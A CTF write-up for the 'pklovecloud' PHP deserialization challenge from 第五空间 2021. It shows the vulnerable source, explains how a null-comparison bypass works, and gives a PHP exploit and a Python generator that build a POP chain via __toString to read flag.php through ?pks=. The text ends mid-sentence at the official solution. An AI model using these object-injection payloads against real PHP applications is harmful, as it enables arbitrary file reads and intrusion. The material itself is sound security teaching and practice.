Contents
[第五空间 2021]yet_another_mysql_injection
[第五空间 2021]pklovecloud
<?php
include 'flag.php';
class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new pkshow;   // not run by unserialize(), so $cinder is attacker-controlled
    }
    function __toString()
    {
        if (isset($this->cinder))
            return $this->cinder->echo_name();   // point $cinder at an ace object to reach ace::echo_name()
    }
}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
    function echo_name()
    {
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;   // $heat is never defined, so neutron is always null
        if($this->openstack->neutron === $this->openstack->nova)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);   // arbitrary file read relative to the web root
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}
if (isset($_GET['pks']))
{
    $logData = unserialize($_GET['pks']);   // entry point: attacker-controlled serialized data
    echo $logData;                          // echo on an object triggers acp::__toString()
}
else
{
    highlight_file(__file__);
}
?>
The exp is easy to build; the only thing to get past is this check in ace::echo_name():
    $this->openstack = unserialize($this->docker);
    $this->openstack->neutron = $heat;
    if($this->openstack->neutron === $this->openstack->nova)
This is the key code. $heat is never defined, so neutron is always set to null, and the comparison passes whenever nova is null as well. If docker is an empty string, unserialize('') returns false rather than an object; reading a property from a non-object yields null (with a notice), so both sides of the === are null and the check is bypassed. One caveat: on PHP 7 the assignment $this->openstack->neutron = $heat silently turns that false into an empty stdClass (warning "Creating default object from empty value"), but on PHP 8 the same assignment on a bool throws an Error, so the empty-docker trick only works on PHP 7. On PHP 8, docker has to hold a serialized object whose nova is null, for example O:3:"acp":0:{}.
Test code:
<?php
$a = "";
$b = unserialize($a);
var_dump($b);                    // bool(false): unserialize() fails on an empty string
var_dump($b->sss);               // NULL, plus a "property of non-object" notice/warning (not an exception)
var_dump($b->ttt->xxx === null); // bool(true)
?>
As the code above shows, every property read through $b comes back null.
Construct the exp:
<?php
// Stubs of the challenge classes: no methods, so nothing runs on our side,
// and no __construct, so $cinder is not overwritten with a pkshow.
class acp
{
    public $cinder;   // protected in the challenge; the plain name still maps onto it on PHP 7.1+
    public $neutron;
    public $nova;
}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
}
$b = new acp();
$c = new ace();
$b->cinder = $c;          // echo $logData -> acp::__toString() -> ace::echo_name()
$c->docker = '';          // unserialize('') is false, so neutron === nova (null === null)
$c->filename = 'flag.php';
echo urlencode(serialize($b));
?>
I didn't get it to run, but I checked it against the writeup and there is no problem with it.
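As an added example (mine, not code from the original post or from the challenge authors), the following Python builds the same POP chain payload without PHP's serialize(), so the exact bytes on the wire are visible. It implements PHP's property-name mangling (a protected property is stored as "\0*\0name", which the exp above sidesteps by declaring $cinder public; PHP 7.1 and later accept the plain name for a protected property as well), reproduces the empty-docker payload from the exp, and also builds a docker value that is an empty serialized acp, so nova and neutron are both null without the assignment-on-false step that PHP 8 rejects. Class, property and file names are the challenge's; the helper names (PhpObject, build_chain, php8_safe_payload, as_query) are assumptions of this example.

```python
from dataclasses import dataclass
from urllib.parse import quote


@dataclass
class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) triples
    in declaration order, which is the order serialize() emits them."""
    cls: str
    props: list


def mangle(name: str, visibility: str, cls: str) -> str:
    """PHP's property-name mangling as it appears inside serialized strings."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return "\x00*\x00" + name            # protected: NUL * NUL name
    if visibility == "private":
        return "\x00" + cls + "\x00" + name  # private: NUL ClassName NUL name
    raise ValueError(f"unknown visibility {visibility!r}")


def php_serialize(value) -> str:
    """Minimal serialize() covering the types this chain needs."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:1;" if value else "b:0;"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # s:<byte length>:"<raw bytes>"; the length counts bytes, not characters
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(name, vis, value.cls)) + php_serialize(v)
            for name, vis, v in value.props
        )
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def build_chain(docker: str, cinder_visibility: str = "public", filename: str = "flag.php") -> str:
    """acp->cinder = ace: echo $logData -> acp::__toString() -> ace::echo_name()."""
    ace = PhpObject("ace", [
        ("filename", "public", filename),
        ("openstack", "public", None),
        ("docker", "public", docker),
    ])
    acp = PhpObject("acp", [
        ("cinder", cinder_visibility, ace),  # declared protected in the challenge
        ("neutron", "public", None),
        ("nova", "public", None),
    ])
    return php_serialize(acp)


def empty_docker_payload() -> str:
    """The writeup's exp: docker = '' so unserialize() returns false (works on PHP 7 only)."""
    return build_chain("")


def php8_safe_payload() -> str:
    """docker = an acp with no properties set: unserialize() yields a real object whose
    nova is null, so neutron (= undefined $heat = null) === nova on both PHP 7 and PHP 8."""
    inner = php_serialize(PhpObject("acp", []))   # O:3:"acp":0:{}
    return build_chain(inner, cinder_visibility="protected")


def as_query(payload: str) -> str:
    """URL-encode for ?pks=...; the NUL bytes from mangling become %00."""
    return quote(payload, safe="")


if __name__ == "__main__":
    print(as_query(empty_docker_payload()))
    print(as_query(php8_safe_payload()))
```

Either output goes straight into ?pks=; the second one carries %00%2A%00cinder, which is what a serialized protected property looks like once URL-encoded, and is the form to use if the exp above is sent to a PHP 8 target.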
Official solution:
<?php
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {